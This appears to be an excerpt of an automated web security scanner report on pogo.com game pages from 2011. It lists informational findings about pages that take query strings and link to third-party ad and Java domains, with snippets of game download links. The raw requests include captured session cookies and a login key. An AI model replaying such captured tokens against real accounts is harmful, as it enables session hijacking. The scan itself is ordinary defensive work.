<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118870270&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/VirtualVillagers4TheTreeofLife/VirtualVillagers4TheTreeofLife81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" target="_self" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/virtual_villagers_4_50642057-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=virtual_villagers_4_50642057-setup.exe" target="_self" onclick="omnitureLogDownload('118580497','oberonpogostd','Virtual Villagers 4','Strategy','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118580497&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/build_a_lot_4/build_a_lot_481x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" target="_self" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/build_a_lot_4-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=build_a_lot_4-setup.exe" target="_self" onclick="omnitureLogDownload('11743417','oberonpogostd','Build a Lot 4','puzzle','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11743417&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/Zombie_BowlORama/Zombie_BowlORama81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" target="_self" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zombie_bowl-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Arcade&ln=en&ext=zombie_bowl-setup.exe" target="_self" onclick="omnitureLogDownload('117842230','oberonpogostd','Zombie Bowl O Rama','arcade','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117842230&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/peggle_nights/peggle_nights81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" target="_self" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/peggle_nights-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Strategy&ln=en&ext=peggle_nights-setup.exe" target="_self" onclick="omnitureLogDownload('115563203','oberonpogostd','Peggle Nights','Strategy','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115563203&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/zumas_revenge/zumas_revenge81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zumas_revenge-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=zumas_revenge-setup.exe" target="_self" onclick="omnitureLogDownload('117734103','oberonpogostd','Zumas Revenge','puzzle','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time)"><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=117734103&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time)">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/SCRABBLETour/SCRABBLETour81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/SCRABBLE_Tour-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Pogo Originals&ln=en&ext=SCRABBLE_Tour-setup.exe" target="_self" onclick="omnitureLogDownload('118594473','oberonpogostd','Scrabble Tour','Pogo Original','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118594473&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/MahjonggDimensionsDeluxe/MahjonggDimensionsDeluxe81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" target="_self" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top" width="81" style="padding-left:5px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 9:09:55 PM')" target="_self" ><img src="/images/games/skip_bo_castaway_caper/skip_bo_castaway_caper81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="width:78px">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 9:09:55 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/skip_bo_castaway_caper_network-setup.exe?RefId=headernav_fp_shopmenu&origin=hp_catGame_lnk&genre=Cards&ln=en&ext=skip_bo_castaway_caper_network-setup.exe" target="_self" onclick="omnitureLogDownload('1180130','oberonpogostd','SKIP-BO Castaway Caper (networ','cards','1/8/2011 9:09:55 PM')">Try Free</a>
...[SNIP]...
<td nowrap style="padding-left:5px"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=1180130&channel=110184400&RefID=headernav_fp_shopmenu&orign=hp_catGame_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...

16.25. http://game3.pogo.com/error/java-problem.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/error/java-problem.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://game3.pogo.com/error/java-problem.jsp?site=pogo

The response contains the following link to another domain:

http://www.java.com/js/deployJava.js

Request

GET /error/java-problem.jsp?site=pogo HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:43 GMT
Server: Apache-Coyote/1.1
Content-Length: 6747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Game loading error
   </title>



...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...

16.26. http://game3.pogo.com/exhibit/game/game.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/game/game.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://game3.pogo.com/exhibit/game/game.jsp?game=scrabble&site=pogo&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?
http://ad.doubleclick.net/adj/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?
http://ad.doubleclick.net/jump/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?

Request

GET /exhibit/game/game.jsp?game=scrabble&site=pogo&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ. HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 1822
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1

<html>

<head>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>

<script language="Javascript">function doRotate(){var ref = parent.game;if (ref == null) { return true; }va
...[SNIP]...
<td><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?"></script><noscript><a href="http://ad.doubleclick.net/jump/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?" target="ad"><img src="http://ad.doubleclick.net/ad/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?" width=728 height=90 border=0 alt="Click Here!"></a>
...[SNIP]...

16.27. http://game3.pogo.com/exhibit/intermission.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/intermission.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://game3.pogo.com/exhibit/intermission.jsp?game=scrabble&vers=11.1.9.44&site=pogo&background=-13408564&vmtype=sun&foreground=-1&install=true

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?
http://ad.doubleclick.net/adj/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?
http://ad.doubleclick.net/jump/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?

Request

GET /exhibit/intermission.jsp?game=scrabble&vers=11.1.9.44&site=pogo&background=-13408564&vmtype=sun&foreground=-1&install=true HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 2103
Date: Sun, 09 Jan 2011 02:15:36 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
<div class="adWrap">


               <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?"></script><noscript><a href="http://ad.doubleclick.net/jump/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?" target="ad"><img src="http://ad.doubleclick.net/ad/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?" width=500 height=350 border=0 alt="Click Here!"></a>
...[SNIP]...

16.28. http://game3.pogo.com/exhibit/loading/loading.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319?
http://ad.doubleclick.net/adj/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319?
http://ad.doubleclick.net/jump/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319?

Request

GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

16.29. http://game3.pogo.com/exhibit/loading/loading.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/scrabble.pogo/load;dcopt=ist;g=1;tile=1;sz=500x350;ord=106931?
http://ad.doubleclick.net/adj/scrabble.pogo/load;dcopt=ist;g=1;tile=1;sz=500x350;ord=106931?
http://ad.doubleclick.net/jump/scrabble.pogo/load;dcopt=ist;g=1;tile=1;sz=500x350;ord=106931?

Request

GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

16.30. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The page was loaded from a URL containing a query string:

